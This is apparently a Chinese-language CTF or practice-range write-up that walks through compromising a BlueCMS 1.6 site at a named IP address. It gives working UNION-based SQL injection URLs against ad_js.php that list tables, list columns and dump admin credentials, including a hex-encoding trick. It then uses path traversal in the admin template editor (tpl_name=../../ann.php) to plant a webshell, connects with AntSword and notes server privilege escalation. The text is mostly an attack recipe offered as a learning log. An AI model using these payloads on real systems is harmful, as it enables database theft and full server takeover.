拿到题 睁大眼就能看见底下的 bluecms 1.6 ?百度了一下漏洞位置 ?学习了PW的姿势
SQL注入位置
http://59.63.200.79:8003/bluecms/uploads/ad_js.php?ad_id=1
Order by 7 字段长度为7
注入表名payload:
ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()
注入字段payload:
ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x626c75655f61646d696e
这里出了个问题 如下图: ? blue_admin ?被包住了 使用反引号 是绕不过去的 ?解决办法是字符串转16进制来解决
注入账户密码payload:
ad_js.php?ad_id=1%20union%20select%201,2,3,4,5,6,group_concat(admin_name,0x3a,pwd)%20from%20blue_admin
这里注入的结果是要用查看源代码的方式:(目前没搞懂为什么有些地方要查看源代码才能看报错回显)
cmd5解密后答案为 ??123abcufo ?怀疑是有人故意改的 不然掌控也太坑了 搞这个密码,浪费我一块钱!!
后台拿shell
进入后台 检查了一下 发现有fck的上传组件 ?这块是漏洞的 不过要本地构造 我记得 没测试哈。。
系统设置里面看见了一个 ?数据库备份 和模板管理?
记得之前研究dedecms的时候 有用模板来改写shell和 aspcms的提权也可以用到模板来写 ?
Sql备份这块之前有记得 搞什么系统的时候 备份可以改名 然后直接拿shell
一些时间尝试后, ?模板存在 跨目录访问权限 ,当然也靠网上给的一些姿势 自己只是觉得这块可能出发问题 但是没他们说的这么猛
点击右键ann.htm的编辑 新建一个链接出来,
http://59.63.200.79:8003/bluecms/uploads/admin/tpl_manage.php?act=edit&tpl_name=ann.htm
看见语句 tpl_name=ann.htm ? 这里构造 ../../ann.php
可直接写入,访问地址为 根目录的 ann.php ?(关于这个思路 我认为是肯定要本地部署才能猜出来的 毕竟我能想到跨目录改写,肯定猜不出 ann.htm所对应调用的文件名是什么。。 PS:测试了创建了一个不存在的文件名,以为可以直接强制写入新文件,测试下来发现是不行的!)
写入连接蚂剑
shell提权服务器
Phptudy 就是猛,永远的跨目录,永远的高权限. 要是换个宝塔,我现在能力还真没办法想着去K服务器了
没啥技术性说法,也没啥姿势可谈,小三句 直接插入完成。
看看服务器端口号是多少
给出查看语句 ?
Tasklist -svc
Netstat -ano
END.....